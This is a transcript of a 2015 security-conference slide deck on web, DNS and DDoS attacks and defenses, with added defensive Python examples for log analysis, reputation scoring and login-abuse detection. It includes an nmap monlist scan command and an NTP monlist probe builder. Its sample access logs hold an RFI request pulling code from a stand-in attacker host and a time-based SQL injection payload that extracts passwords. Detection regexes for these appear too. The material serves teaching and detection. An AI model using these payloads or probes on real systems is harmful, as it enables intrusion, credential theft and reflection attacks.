NTXISSACSC3 - Cyber Warfare: Identifying Attackers Hiding Amongst the Flock by Anthony Lauro
1. @NTXISSA #NTXISSACSC3
Cyber Warfare: Identifying Attackers
Hiding Amongst the Flock
Anthony Lauro
Sr. Enterprise Security Architect
Akamai Technologies, Inc
October 3rd, 2015
2.
Who am I? (unphilosophically speaking)
About me:
• Anthony Lauro | CISSP, GWAPT
• Sr. Enterprise Security Architect, Akamai Technologies, Inc
• 16 years Information Security experience
• Advise Akamai clients on cybersecurity resilience
• Lead application security training for the Enterprise Security Architecture team @Akamai
• Attended CCCC a long, long time ago…
15.
2014 Attack Trends
• The top three attack vectors are application layer attacks
• Defacement leads as the top attack, followed by SQLi and account hijacking as the most prevalent attacks seen in 2014
Source: Stateoftheinternet.com
16.
Login Abuse: Account Checker Attacks
The fuel for any account checker is a list of credentials. Fortunately for attackers, there are a huge number of credentials that are public:
• 38,000,000 Adobe accounts
• 318,000 Facebook accounts
• 70,000 Google accounts
• 60,000 Yahoo accounts
• 22,000 Twitter accounts
• 8,000 ADP accounts
• 8,000 LinkedIn accounts
23.
Approaches for Web Security
• On-premise hardware: router, firewall, load balancer, bandwidth
• Application protection cloud service: cloud platform
• ISPs: Internet Service Providers
24.
On-Premises Web Security Approach
On-premise hardware: router, firewall, load balancer, bandwidth
• Bandwidth constraint
• Connection and processing limitations
• Application vulnerability exploitation: “Have to ingest ALL traffic before a Yes/No decision can be made”
• Performance degradation: throughput of devices cannot meet the volume / requests per second of good and bad traffic spikes
• Reliability and accuracy: WAF configurations are complex, often not tuned properly or not in blocking mode
25.
“I put the WAF on a SPAN port. I was afraid of blocking legitimate traffic!”
“How did this breach occur? We have a WAF!!”
26.
Internet Service Provider Approach
ISPs: Internet Service Providers
• DDoS-only protection
• False positives / upstream blacklisting
• Single-homed protection
• Carrier-dependent architecture
• Capacity issues at scale
28.
Application Protection Cloud Service Approach
Application protection cloud service: cloud platform
• Direct-to-origin DDoS protection gap
• Shared infrastructure (capacity constraints)
• Acceptable use monitoring challenge
• Retaining real-time visibility
• Not always enterprise-class protection
29.
“In other words, careful where you aim that gun,
#OpISIS, because it might point back at you as
well.” -Mike Masnick TechDirt
33.
For Internet-facing Applications
(Diagram: User → Internet → Datacenter)
• Web: retrieval and integrity of content and data
• Origin: supporting infrastructure and other applications
• DNS: finding the application
34.
Multiple Perimeters
For Internet-facing Applications
Volumetric Protection
• Massive resiliency
• Thousands of points of presence
• Distributed geographically
• Rate controls for noisy requestors
Attacks Against CNAMEs
• Network and application layer filtering capable
• Protocol validation/Filtering
• SSL decrypt – re-encrypt
• Geo Sensing and Filtering Capable
• Capacity: throughput and packets per second (pps)
Attacks Against Datacenter IPs
• Direct to origin protection using BGP redirection
• Multiple globally distributed scrubbing centers
• Attack capacity to withstand multiple attacks at once
• Good traffic bypass as not to degrade performance
35.
Multiple Perimeters
For Internet-facing Applications
Application Layer Attacks
SSL decryption at scale
Risk scoring rule sets
Tune accuracy over time
Attacks Against DNS
Rate Controls - Connection Throttling
Whitelisting
Application Inspection
DNSSEC
Client/Server Locks
Anycast Responses
Event Visibility
Threat intel gathered and validated against global dataset
Real-Time event correlation between security policies
Ability to identify hosts based on previous malicious behavior
Import log feed from ‘cloud’ into internal SIEM for correlation
38.
Client Reputation Scoring
• Use behavioral data to protect your castle
• Collect and correlate attack traffic into a large dataset from across the web
• Identify bad clients based on past behavior
• Define a risk score for malicious clients
• Filter malicious clients based on risk score
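The scoring scheme the bullets describe, as an added example (not code from the talk or from Akamai's service): attack events reported by several sites are aggregated per client, weighted by category, decayed by age, and boosted when the same source was seen by more than one property; the resulting score then gates requests. The events, category weights, half-life and block threshold are constructed assumptions.

```python
"""Client reputation scoring from shared attack telemetry.

Added example, not code from the talk or from Akamai. Event records,
category weights, half-life and block threshold are constructed
assumptions chosen to illustrate the scheme.
"""
from collections import defaultdict
from datetime import datetime

# Constructed events: (UTC timestamp, source IP, reporting site, attack category).
EVENTS = [
    ("2015-09-28T10:00:00", "198.51.100.7", "shop.example", "sqli"),
    ("2015-09-29T11:30:00", "198.51.100.7", "bank.example", "sqli"),
    ("2015-10-01T02:15:00", "198.51.100.7", "news.example", "rfi"),
    ("2015-10-02T09:00:00", "203.0.113.9", "shop.example", "scan"),
    ("2015-07-01T09:00:00", "203.0.113.9", "shop.example", "sqli"),   # stale event
    ("2015-10-02T09:05:00", "192.0.2.44", "bank.example", "login_abuse"),
]

# Assumed weights: how much one event of each category contributes.
WEIGHTS = {"sqli": 4.0, "rfi": 4.0, "login_abuse": 3.0, "scan": 1.0}
HALF_LIFE_DAYS = 7.0     # an event's contribution halves every 7 days
BLOCK_THRESHOLD = 8.0    # assumed policy: deny at or above this score


def reputation_scores(events, now, half_life_days=HALF_LIFE_DAYS):
    """Return {ip: score}.

    Each event contributes weight * 0.5 ** (age_in_days / half_life), so
    recent behaviour dominates. The per-IP sum is then multiplied by the
    number of distinct sites that reported the client: a source seen
    attacking several unrelated properties outranks one-off noise.
    """
    raw = defaultdict(float)
    sites = defaultdict(set)
    for ts, ip, site, category in events:
        age_days = (now - datetime.fromisoformat(ts)).total_seconds() / 86400
        if age_days < 0:          # ignore clock skew / future-dated reports
            continue
        decay = 0.5 ** (age_days / half_life_days)
        raw[ip] += WEIGHTS.get(category, 1.0) * decay
        sites[ip].add(site)
    return {ip: round(raw[ip] * len(sites[ip]), 2) for ip in raw}


def filter_requests(requests, scores, threshold=BLOCK_THRESHOLD):
    """Split (ip, path) requests into (allowed, denied) by reputation score."""
    allowed, denied = [], []
    for ip, path in requests:
        bucket = denied if scores.get(ip, 0.0) >= threshold else allowed
        bucket.append((ip, path))
    return allowed, denied


def demo(now=datetime(2015, 10, 3, 0, 0, 0)):
    """Score the constructed events and filter a constructed request batch."""
    scores = reputation_scores(EVENTS, now)
    requests = [("198.51.100.7", "/login"), ("203.0.113.9", "/"),
                ("192.0.2.44", "/account"), ("192.0.2.1", "/")]
    allowed, denied = filter_requests(requests, scores)
    return scores, allowed, denied


if __name__ == "__main__":
    s, a, d = demo()
    print("scores:", s)
    print("denied:", d)
```

The breadth multiplier is the part that matters for "hiding amongst the flock": a single site sees each of these clients only briefly, but the client that hit three unrelated properties in a week ends up far above the threshold while the one stale SQLi event from July decays to nothing.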
39.
Information vs. Intelligence
Information:
• Raw, unfiltered feed
• Aggregated from virtually every source
• May be true, false, misleading, incomplete, relevant or irrelevant
• Not actionable
Intelligence:
• Processed, sorted information
• Aggregated from reliable sources and cross-correlated for accuracy
• Accurate, timely, complete, assessed for relevancy
• Actionable
InfoSec teams are swimming in data. More raw “information” is not the solution.
42.
Case Study: 320 Gbps DDoS Attack, Gaming Vertical, APAC Region
• Largest attack ever mitigated by Akamai against a single customer
• Targeted the primary website, supporting network infrastructure, and DNS
• Multiple attack vectors:
  • SYN/UDP floods against the entire subnet
  • Volumetric attack against DNS
• Attack characteristics:
  • 320 Gbps and 71.5 Mpps peak traffic
  • 2.1 million requests/s against DNS
43.
One Attack in a Broader DDoS Attack Campaign
(Chart: peak of each attack over the campaign, Start to End; series: Infrastructure (Gbps), authDNS (Mpps), DNS Reflection (Mpps), Web (Gbps))
21+ day campaign against a single customer
• 39 distinct attacks targeting applications and DNS infrastructure
• Eight attacks >100 Gbps, including the record 320 Gbps attack
44.
Grow revenue opportunities with fast, personalized web experiences and manage complexity from peak demand, mobile devices and data collection.
Opening Ceremony, 1st day of sports
• 132 BILLION requests processed by our WAFs (10x more than the 2010 Winter Olympics)
• WAF rules triggered: 127x more than the 2010 Winter Olympics
• Custom rules triggered: 166,000,000
• Rate controls (adaptive rules) triggered: 5,600,000
• Requests denied: 182,200,000
45.
(Charts: attack traffic over time during the opening ceremony and the Spain vs Netherlands, Chile vs Australia and Ivory Coast vs Japan matches; scores shown: 3-1, 1-5, 1-2, 3-1)
46.
Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks.
(Chart: Web Application Attacks by Industry – Q1 2015)
47.
The Attack du jour? SNMP Reflection
• Reflection attack
• Mostly SNMP v2c devices (~3+ years old) with the default “public” community string: routers, printers, cable modems, NAS
• A new tool automates sending getBulkRequest to open SNMP servers
• A flood of SNMP GetResponse data is sent from the reflectors to the victim on port 80
• The SNMP query begins at the highest OID tree level to obtain the largest possible response
49.
Case Study: NTP Attacks on Origin
• 500x return rate in traffic
• >100 Gbps attack traffic against origin
• 1,000+ increase in hits per second against origin
Attack vector: a request with a spoofed source IP of the target server is sent to a vulnerable NTP server that allows the monlist function. The NTP server replies back to the target IP, direct to origin, at massive scale.
50.
Use the nmap NSE script to identify vulnerable hosts
Example: nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>
• The monitor list in response to the monlist command is limited to 600 associations.
• The monitor capability may not be enabled on the target, in which case you may receive an error number 4 (No Data Available).
• There may be a restriction on who can perform Mode 7 commands (e.g. "restrict noquery" in ntp.conf), in which case you may not receive a reply.
• This script does not handle authentication, and targets expecting auth info may respond with error number 3 (Format Error).
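Added example, not the nmap script's code and not from the talk: it builds the same 8-byte mode 7 MON_GETLIST_1 request that script sends and parses mode 7 replies, so the caveats above can be seen on the wire: error 4 (no data available) when the monitor facility is off, error 3 (format error) when the server expects authentication, the "more" bit that spreads the up-to-600 entries over several datagrams, and the bytes-returned-per-byte-sent ratio that makes monlist a reflection vector. Field layouts follow ntpd's ntp_request.h; the sample replies are constructed, and `probe()` is only for hosts you are authorized to test.

```python
"""NTP mode 7 monlist: probe builder, reply parser, amplification estimate.

Added example; not the talk's code and not nmap's ntp-monlist script.
Field layouts follow ntpd's ntp_request.h. The sample replies below are
constructed so the parser can be exercised offline.
"""
import socket
import struct

IMPL_XNTPD = 3            # implementation number ntpd answers to
REQ_MON_GETLIST_1 = 42    # monlist request code (0x2a)
ITEM_SIZE = 72            # sizeof(struct info_monitor_1)
ERRORS = {0: "okay", 1: "implementation mismatch", 2: "unknown request",
          3: "format error", 4: "no data available", 7: "authentication required"}
HDR = "!BBBBHH"            # rm_vn_mode, auth_seq, implementation, request, err_nitems, mbz_itemsize
ITEM_HEAD = "!IIIIIIIHBB"  # lasttime, firsttime, restr, count, addr, daddr, flags, port, mode, version


def build_monlist_request():
    """Version 2, mode 7, impl 3, request 42: the bytes 17 00 03 2a 00 00 00 00."""
    return struct.pack(HDR, (2 << 3) | 7, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, 0, 0)


def parse_mode7(datagram):
    """Decode one mode 7 datagram into a dict (IPv4 entries only)."""
    if len(datagram) < 8:
        raise ValueError("short mode 7 packet")
    rm_vn_mode, auth_seq, impl, req, err_nitems, mbz_itemsize = struct.unpack(HDR, datagram[:8])
    if rm_vn_mode & 0x07 != 7:
        raise ValueError("not a mode 7 packet")
    error = err_nitems >> 12                     # high 4 bits carry the error code
    info = {
        "response": bool(rm_vn_mode & 0x80),     # set on replies
        "more": bool(rm_vn_mode & 0x40),         # further datagrams follow
        "sequence": auth_seq & 0x7F,
        "implementation": impl,
        "request": req,
        "error": error,
        "error_text": ERRORS.get(error, "unknown"),
        "nitems": err_nitems & 0x0FFF,           # low 12 bits: entries in this datagram
        "itemsize": mbz_itemsize & 0x0FFF,
        "items": [],
    }
    if error != 0:
        return info                              # error replies carry no items
    size, body = info["itemsize"], datagram[8:]
    for i in range(info["nitems"]):
        item = body[i * size:(i + 1) * size]
        if len(item) < 32:
            break                                # truncated datagram
        (lasttime, _firsttime, _restr, count, addr, _daddr, _flags,
         port, mode, version) = struct.unpack(ITEM_HEAD, item[:32])
        info["items"].append({
            "addr": socket.inet_ntoa(struct.pack("!I", addr)),
            "count": count, "port": port, "mode": mode, "version": version,
            "seconds_since_last": lasttime,      # ntpd reports current_time - last
        })
    return info


def amplification_factor(request, replies):
    """Bytes returned per byte sent: the ratio that makes monlist a reflection vector."""
    return sum(len(r) for r in replies) / len(request)


def probe(host, timeout=2.0):
    """Send the probe to a host you are authorized to test; collect every reply datagram."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    replies = []
    try:
        sock.sendto(build_monlist_request(), (host, 123))
        while True:
            data, _ = sock.recvfrom(4096)
            replies.append(data)
            if not parse_mode7(data)["more"]:
                break
    except socket.timeout:
        pass                                     # silence: filtered, or "restrict noquery"
    finally:
        sock.close()
    return replies


# Constructed sample replies (not captured traffic).
def make_item(addr, count, port=123, mode=3, version=4):
    a = struct.unpack("!I", socket.inet_aton(addr))[0]
    head = struct.pack(ITEM_HEAD, 100, 50, 0, count, a, 0, 0, port, mode, version)
    return head + b"\x00" * (ITEM_SIZE - len(head))   # v6_flag, padding, v6 addresses


def make_reply(items=(), error=0, more=False, seq=0):
    rm_vn_mode = 0x80 | (0x40 if more else 0) | (2 << 3) | 7
    hdr = struct.pack(HDR, rm_vn_mode, seq & 0x7F, IMPL_XNTPD, REQ_MON_GETLIST_1,
                      (error << 12) | len(items), ITEM_SIZE if items else 0)
    return hdr + b"".join(items)


SAMPLE_OK = make_reply([make_item("192.0.2.10", 1200), make_item("198.51.100.5", 3)])
SAMPLE_NODATA = make_reply(error=4)   # monitor facility disabled on the server
SAMPLE_FMT = make_reply(error=3)      # server expected authentication data
```

A two-entry reply is already 19 bytes back for every byte sent; a server holding the full 600 entries answers in a train of datagrams, which is where the hundreds-fold return rate on the previous slide comes from. The fix on the server side is the same "restrict noquery" (or disabling the monitor facility) that makes the probe come back empty.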
52.
DNS Attack Targeting Akamai Customer
• DNS requests peaked at 168k per second.
• 19B hits in 5 days. Normally serve ~30M hits per week.
53.
DNS Hijack Attacks: a Common Tactic for Middle Eastern Attackers
Best practice: DNS locks
• Client DNS locks (set by the registrar): clientUpdateProhibited, clientTransferProhibited, clientDeleteProhibited
• Registrar locks (the server-side codes, set by the registry at the registrar's request): serverUpdateProhibited, serverTransferProhibited, serverDeleteProhibited
(Image: US DoD's DNS hijacked)
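Added example, not from the talk: a check of the locks above against the "Domain Status" lines a WHOIS lookup prints. The client* codes are applied by the registrar and can be cleared from a compromised registrar account; the server* codes are applied by the registry and cannot, so both sets have to be present before a hijacked registrar login cannot move the domain. The WHOIS text is constructed; "Domain Status:" is the gTLD output format, and the regex is an assumption to adjust for ccTLD registries that print status differently.

```python
"""Check a domain's registrar and registry locks from WHOIS output.

Added example, not from the talk. The WHOIS excerpts are constructed;
the "Domain Status: <code> <url>" line format is what gTLD registrars
print, and the regex is an assumption for other registries.
"""
import re
import subprocess

CLIENT_LOCKS = {"clientUpdateProhibited", "clientTransferProhibited", "clientDeleteProhibited"}
SERVER_LOCKS = {"serverUpdateProhibited", "serverTransferProhibited", "serverDeleteProhibited"}
ALL_LOCKS = CLIENT_LOCKS | SERVER_LOCKS

# One status per line, e.g. "Domain Status: clientTransferProhibited https://icann.org/epp#..."
STATUS_RE = re.compile(r"^\s*Domain Status:\s*([A-Za-z]+)", re.IGNORECASE | re.MULTILINE)


def parse_statuses(whois_text):
    """Set of EPP status codes found in the WHOIS text."""
    return set(STATUS_RE.findall(whois_text))


def lock_report(whois_text):
    """Which locks are set, which are missing, and whether the domain is fully locked."""
    have = parse_statuses(whois_text)
    return {
        "present": sorted(have & ALL_LOCKS),
        "missing_client": sorted(CLIENT_LOCKS - have),   # registrar-side locks
        "missing_server": sorted(SERVER_LOCKS - have),   # registry-side locks
        "fully_locked": ALL_LOCKS <= have,
    }


def check_domain(domain):
    """Run the system `whois` client (assumed installed) and report on the result."""
    out = subprocess.run(["whois", domain], capture_output=True, text=True, timeout=30).stdout
    return lock_report(out)


# Constructed WHOIS excerpts (not real lookups).
LOCKED_SAMPLE = """\
Domain Name: EXAMPLE-LOCKED.TEST
Registrar: Example Registrar, Inc.
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
"""

PARTIAL_SAMPLE = """\
Domain Name: EXAMPLE-OPEN.TEST
Registrar: Example Registrar, Inc.
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
"""

if __name__ == "__main__":
    for sample in (LOCKED_SAMPLE, PARTIAL_SAMPLE):
        print(lock_report(sample))
```

Run `check_domain()` against every domain your applications and DNS depend on, not just the primary brand: an attacker who can change the name servers of a CNAME target or a mail domain gets the same result as hijacking the main domain.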
54.
Remote File Inclusion
(Screenshot: RFI attempt to pull a click.php file from a remote location, using the RFI vulnerability in the TimThumb plugin)
55.
Here’s what click.php is really about!
HTTP(S) redirections can fluctuate between 14-20 different pay-per-click companies and advertisers, and that means precious bitcoin revenue for the attacker and his friends.
http://www.secureworks.com/cyber-threat-intelligence/threats/ppc-hijack/
56.
When good things go bad:
Rogue Reseller to Competitor
“After years of this relationship we recently found that they now have a copycat site and are selling
our products that they are now manufacturing on their own.” – Enterprise Manufacturing Customer
“At first they were just scraping our site and we saw it to be mutually beneficial…”
57.
Blind SQL Injection: Time-Based Attack
This type of blind SQL injection relies on making the database pause for a specified amount of time and examining the response time. Using this method, an attacker enumerates each letter of the desired piece of data.
(Diagram: client request)
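Added example, not from the talk, covering both the TimThumb-style RFI on the previous slides and the time-based blind injection just described: it scans access-log lines for a parameter whose value is a remote URL and for database sleep primitives, and uses the server's own response time to tell a successful delay (a correct letter guess) from a failed one. The log lines are constructed; the Apache combined format with %D (microseconds) appended and the one-second confirmation threshold are assumptions.

```python
"""Flag RFI and time-based blind SQLi probes in web access logs.

Added example, not from the talk. Assumes Apache combined log format
with %D (request time in microseconds) appended; the log lines below
are constructed.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<micros>\d+)$')

# A parameter whose value is itself a URL: include()/file_get_contents() would fetch it.
RFI_RE = re.compile(r"^\s*(https?|ftp)://", re.IGNORECASE)
# Database sleep primitives used by time-based blind injection (MySQL, MSSQL, PostgreSQL).
TIME_SQLI_RE = re.compile(r"\b(sleep\s*\(|waitfor\s+delay\b|benchmark\s*\(|pg_sleep\s*\()",
                          re.IGNORECASE)
DELAY_CONFIRM_MICROS = 1_000_000   # assumed: a response of 1 s or more corroborates the pause


def parse_line(line):
    """Return the log fields as a dict, or None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["micros"] = int(entry["micros"])
    return entry


def inspect_request(entry):
    """Findings for one parsed entry: one per offending query parameter."""
    findings = []
    for name, value in parse_qsl(urlsplit(entry["target"]).query, keep_blank_values=True):
        value = unquote_plus(value)      # decode once more: attackers double-encode
        if RFI_RE.match(value):
            findings.append({"ip": entry["ip"], "rule": "rfi", "param": name,
                             "evidence": value[:80], "confirmed_delay": False})
        elif TIME_SQLI_RE.search(value):
            findings.append({"ip": entry["ip"], "rule": "time_based_sqli", "param": name,
                             "evidence": value[:80],
                             "confirmed_delay": entry["micros"] >= DELAY_CONFIRM_MICROS})
    return findings


def analyze(lines):
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry:
            findings.extend(inspect_request(entry))
    return findings


def summarize(findings):
    """Per-IP counts by rule. A client whose sleeps keep being confirmed is
    extracting data one character at a time, not just scanning."""
    per_ip = defaultdict(Counter)
    for f in findings:
        per_ip[f["ip"]][f["rule"]] += 1
        if f["confirmed_delay"]:
            per_ip[f["ip"]]["confirmed_delay"] += 1
    return per_ip


# Constructed log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Oct/2015:10:00:01 -0500] "GET /wp-content/themes/x/timthumb.php?src=http://evil.example/click.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" 8123',
    '198.51.100.9 - - [03/Oct/2015:10:00:05 -0500] "GET /item.php?id=1%27%20AND%20IF(SUBSTR((SELECT%20password%20FROM%20users%20LIMIT%201),1,1)=%27a%27,SLEEP(5),0)--%20 HTTP/1.1" 200 2048 "-" "python-requests/2.7.0" 5012345',
    '198.51.100.9 - - [03/Oct/2015:10:00:11 -0500] "GET /item.php?id=1%27%20AND%20IF(SUBSTR((SELECT%20password%20FROM%20users%20LIMIT%201),2,1)=%27b%27,SLEEP(5),0)--%20 HTTP/1.1" 200 2048 "-" "python-requests/2.7.0" 3900',
    '192.0.2.20 - - [03/Oct/2015:10:00:12 -0500] "GET /item.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0" 3500',
    '192.0.2.21 - - [03/Oct/2015:10:00:13 -0500] "GET /search?q=sleep+tips HTTP/1.1" 200 9000 "-" "Mozilla/5.0" 4000',
]

if __name__ == "__main__":
    for ip, counts in summarize(analyze(SAMPLE_LOG)).items():
        print(ip, dict(counts))
```

The response-time column is what separates this from a plain signature match: the two probes from 198.51.100.9 look identical to a WAF, but the 5-second response on the first says the guess for position 1 was right and the 4-millisecond response on the second says the guess for position 2 was wrong. A client with a growing tally of confirmed delays is reading the table out letter by letter, which is the behaviour to block on, independent of how the payload is encoded.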
58.
SQL Injection Analysis
2000 customers over one week
Protocol breakdown:
Protocol | SQL Injection Attacks | %
HTTP | 8,137,681 | 96.6
HTTPS | 287,808 | 3.4
Total | 8,425,489 | 100
(Chart: breakdown by intent)
Source: Akamai CSI
62.
Account Checkers: Carders
Several techniques are used to avoid detection and mitigation, including:
● Randomization of the User-Agent header
● Targeting of alternative (mobile/API/legacy) login pages, which may have weaker mitigation controls and are often overlooked by the customer
● Attacks originate from a highly distributed set of IP addresses, with different source countries
● Use of low request rates to evade rate controls
● Change in the order of headers
● Changes in tactics when 403 responses are received
63.
Fraud – Vietnamese Carders
Carder TTP
• Build Tools Server
• Cultivate List of Open Proxies
• Acquire Compromised Logins
• Check/Alter Compromised Accounts
• Make Fraudulent Purchases
• Cash out/Resell gift cards
65.
Login Abuses: TTPs and Defenses
Rate controls to block fast-moving scripts
• The attack relies on being able to check thousands of accounts quickly
• Blocking aggressive scripts prevents login exploitation
Internal monitoring for changes to customer accounts
• Email address
• Shipping address
• Same email on multiple accounts
Geo blocklists for areas where there is no business
• Cuts down on the places attackers can launch from
• Do cloud server providers need to access your webpage?
Custom rules to block User-Agent strings (or lack thereof)
• Attack scripts are often simple and will contain only “curl” or “wget”
• Sometimes no User-Agent at all
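Added example, not from the talk, that applies the defenses above, together with the evasion list on the "Account Checkers: Carders" slide, to a batch of login events: a sliding-window rate control catches the fast script, a User-Agent rule catches bare curl/wget or empty agents, a population check catches the distributed low-rate checker that both of those rules miss (many sources, each making only a couple of failed attempts against different accounts, none succeeding), and account-change monitoring flags one email address landing on several accounts. Events, user agents and thresholds are constructed assumptions.

```python
"""Detect account-checker traffic on a login endpoint.

Added example, not from the talk. Login events, account changes and all
thresholds below are constructed assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

RATE_WINDOW = timedelta(seconds=60)
RATE_MAX_ATTEMPTS = 10          # assumed: more than this per IP per minute is a script
TOOL_UA_RE = re.compile(r"^(curl|wget|python-requests|libwww-perl)\b", re.IGNORECASE)
LOW_RATE_MAX = 3                # a checker that hides stays at or under this per IP
CAMPAIGN_MIN_SOURCES = 5        # assumed baseline: more low-rate all-fail sources means a campaign


def fast_scripts(logins, window=RATE_WINDOW, max_attempts=RATE_MAX_ATTEMPTS):
    """IPs exceeding max_attempts in any sliding window. Events: (ts, ip, user, ua, ok)."""
    by_ip = defaultdict(list)
    for ts, ip, _user, _ua, _ok in logins:
        by_ip[ip].append(ts)
    flagged = set()
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            if end - start + 1 > max_attempts:
                flagged.add(ip)
                break
    return flagged


def bad_user_agents(logins):
    """IPs whose login requests carry no User-Agent or a bare tool string."""
    return {ip for _ts, ip, _u, ua, _ok in logins if not ua.strip() or TOOL_UA_RE.match(ua)}


def distributed_checker(logins, low_rate_max=LOW_RATE_MAX, min_sources=CAMPAIGN_MIN_SOURCES):
    """Sources that each stay under the rate limit, never succeed and never retry
    the same account. Many of them at once is one checker spread across proxies,
    not many users mistyping passwords; a lone source is ignored."""
    attempts, failures, users = defaultdict(int), defaultdict(int), defaultdict(set)
    for _ts, ip, user, _ua, ok in logins:
        attempts[ip] += 1
        failures[ip] += 0 if ok else 1
        users[ip].add(user)
    suspects = sorted(ip for ip in attempts
                      if attempts[ip] <= low_rate_max
                      and failures[ip] == attempts[ip]
                      and len(users[ip]) == attempts[ip])
    return suspects if len(suspects) >= min_sources else []


def shared_contact_changes(changes):
    """Account changes (account, field, new_value): the same new email on several accounts."""
    owners = defaultdict(set)
    for account, field, value in changes:
        if field == "email":
            owners[value.lower()].add(account)
    return {email: sorted(accts) for email, accts in owners.items() if len(accts) > 1}


# Constructed events (not real traffic).
BASE = datetime(2015, 10, 3, 9, 0, 0)
LOGINS = []
# A fast checker: 25 accounts in 25 seconds from one IP, plain curl.
LOGINS += [(BASE + timedelta(seconds=i), "203.0.113.7", f"user{i}", "curl/7.43.0", False)
           for i in range(25)]
# A script with no User-Agent at all.
LOGINS += [(BASE + timedelta(seconds=40), "203.0.113.8", "user99", "", False)]
# A distributed checker: eight proxies, two failed attempts each, spread over minutes, browser UA.
for k in range(8):
    ip = f"198.51.100.{10 + k}"
    for j, user in enumerate((f"acct{k}a", f"acct{k}b")):
        LOGINS.append((BASE + timedelta(seconds=30 * k + 120 * j), ip, user,
                       "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/40.0", False))
# Legitimate users: one success, one typo followed by success.
LOGINS += [(BASE + timedelta(seconds=50), "192.0.2.5", "alice", "Mozilla/5.0 (X11; Linux x86_64)", True),
           (BASE + timedelta(seconds=55), "192.0.2.6", "bob", "Mozilla/5.0 (Macintosh)", False),
           (BASE + timedelta(seconds=70), "192.0.2.6", "bob", "Mozilla/5.0 (Macintosh)", True)]

CHANGES = [("acct3a", "email", "drop@mail.example"), ("acct5b", "email", "Drop@mail.example"),
           ("alice", "shipping_address", "1 Main St"), ("bob", "email", "bob@mail.example")]


def report(logins=LOGINS, changes=CHANGES):
    return {
        "fast_scripts": sorted(fast_scripts(logins)),
        "tool_user_agents": sorted(bad_user_agents(logins)),
        "distributed_sources": distributed_checker(logins),
        "shared_emails": shared_contact_changes(changes),
    }


if __name__ == "__main__":
    print(report())
```

The first two rules are the ones the slide lists, and the fast script trips both. The eight proxy addresses trip neither: two attempts a minute apart with a real browser string is exactly the "low request rates" and "highly distributed set of IP addresses" evasion described two slides earlier. They only stand out as a population, which is why the third check counts low-rate, all-failure, no-repeat sources against a baseline instead of judging each IP alone; bob's single typo is excluded because his second attempt succeeds.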
69.
Looking Forward into 2015
• Industry verticals
  • Gaming, financial services, Internet & telecom, software & tech, and media verticals expected to be targeted heavily in 2015
  • Security vulnerabilities continue to increase due to bespoke/custom applications
  • Good history of successful attacks
• DDoS attacks
  • Expect more ‘mega’ attacks >100 Gbps
  • Commoditization of DDoS attacks
  • IPv6 uptake to increase the DDoS vector
  • Never pay ransoms, but do have a plan
• Application attack trends
  • AppSec is failing: need help!
  • If you don’t have an AppSec program, start one!
  • Injection & XSS ride the OWASP Top 10
  • Session management: you’re doing it wrong
  • Developers: you’re behind!
70.
Cyber Security Requirements: 5 Points To Take Away
1. You need ‘validated’ data: to derive intelligence on current and evolving threats.
2. Scale, availability and resilience: to be high performing, take the punches, and stay online.
3. A plan: to understand how to respond to bad-day scenarios.
4. Control and flexibility: to adapt your defenses dynamically.
5. People and experience: to execute every time you come under attack.
71.
RESOURCES
OWASP: OPEN WEB APPLICATION SECURITY PROJECT
https://www.owasp.org/index.php/Main_Page
BSIMM5: BUILDING SECURITY IN MATURITY MODEL v5
https://www.bsimm.com/
SANS SWAT: SECURING WEB APPLICATION TECHNOLOGIES v1.1
http://software-security.sans.org/resources/swat
CERT: SECURE CODING STANDARDS
http://www.cert.org/secure-coding/research/secure-coding-standards.cfm?
AKAMAI TECHNOLOGIES (HEY, WHY NOT)
https://www.akamai.com/us/en/cloud-security.jsp
73.
The Collin College Engineering Department
Collin College Student Chapter of the North Texas ISSA
North Texas ISSA (Information Systems Security Association)
NTX ISSA Cyber Security Conference – October 2-3, 2015
Thank you